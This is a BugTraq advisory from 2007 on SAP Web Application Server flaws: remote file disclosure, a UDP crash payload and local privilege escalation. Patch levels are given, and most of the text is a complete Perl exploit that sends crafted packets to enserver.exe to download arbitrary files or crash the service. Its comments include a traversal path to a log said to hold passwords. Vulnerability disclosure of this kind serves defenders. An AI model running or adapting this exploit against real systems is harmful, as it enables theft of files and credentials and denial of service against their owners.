BugTraq
Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technicaldetails) Feb 08 2007 10:08PM
Nicob (nicob nicob net)

Multiple vulnerabilities in SAP Web Application Server
Technical details

Application : SAP Web AS 6.40 < patch 136 and 7.00 < patch 66
Platform : All platforms (except the third vulnerability)
Impacts : Remote file disclosure, remote DoS, local privilege escalation
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>

Vulnerabilities technical details :
===================================

1) A remote file disclosure vulnerability allows reading any file to
which the user that the SAP Web Application Server is running as had
access. Under Windows, the service runs by default under the
SAPServiceJ2E account. This account is member of the local administrator
group.

Exploit : use "r3-stealer-1.0.pl" (attached)

Note : Absolute paths can be used, so "C:\boot.ini" and "\\10.11.12.13
\share\image.jpg" are both OK.

2) A remote denial of service allows crashing the enserver.exe process.

Exploit : send "\x72\xfe" on port UDP/64999

3) A local privilege escalation vulnerability allows any local user to
use the file disclosure vulnerability to access an user-controlled
process via a named pipe and impersonate as user SAPServiceJ2E. The
exploitation is possible only on Windows 2000 pre-SP4, Windows XP
pre-SP2 and Windows NT.

Exploit : use "r3-stealer-1.0.pl" (attached) and "tac0tac0.c" [1]

Solutions :
===========

Apply patch 136 or newer for version 6.40
Apply patch 66 or newer for version 7.00

Note : the mentioned patch level refers to the enqueue server
More details can be found in SAP notes 948457 and 959877

[1] : http://security.nnov.ru/files/tac0tac0.c

Nicob
#!/usr/bin/perl -w

##
## SAP 'enserver.exe' file downloader
## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauth
z/security/authorization_constants.asp
##
## File parameter :
## C:\boot.ini
## \\10.11.12.13\share\image.jpg
## ..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
##

# Init

use strict;
use IO::Socket;

my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = "";

my $socket;
my $reply;

$|=1;

# Get arguments

if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 <ip> <port> <remote filename> (<local filename>)\n";}
my $host=$ARGV[0];
my $port=$ARGV[1];
my $filename=$ARGV[2];
my $output=$ARGV[3];

# Calculate variables

my $lg = length($filename);
my $tag1 = sprintf('%x', 0x4F + $lg);
my $tag2 = sprintf('%x', 0x20 + $lg);

# Show banner

print "#####################################################################\n
";
print "### SAP 'enserver.exe' file downloader\n";
print "### Downloading '$filename' from '$host'\n";
print "#####################################################################\n
\n";

# Define the packets

my $packet1 =
"0000005dabcde123000000000000005d0000005d0601000000000006000000000004000
0000000010004000000000003". # Static
"5f6e69636f625f6e69636f625f6e69636f62315f". # ASCII string : "_nicob_nicob_nicob1_"
"00000000020000003b0000000500000002000000060000000400000001"; # Static

my $packet2 =
"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
"03000000454e43000101000023454141010000001303000000000023454145000100000
0". $tag2 .
"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144"; # Crash if bad filename length

# Create the socket

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
|| die "Connection refused at [$host:$port]";

# Send the two packet

print $socket pack("H*",$packet1);
print $socket pack("H*",$packet2);

sleep 2;

# Read and display response

recv($socket,$reply,150000,MSG_PEEK);
if ($reply =~ /^(.*)#EAD(.*)$/s) {
print "File received !\n";
if ((!defined($output)) or ($output eq "")) {
print "\n===========================================\n";
print $2;
print "\n===========================================\n";
} else {
open(OUT, "> $output") || die "Can't open $output ($0)";
print "File saved as '$output'\n";
print OUT $2;
close(OUT);
}
} else {
print "Problem interpreting reply :-(\n";
}

# Close the socket

print "\nThe end ...\n";
close $socket;

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus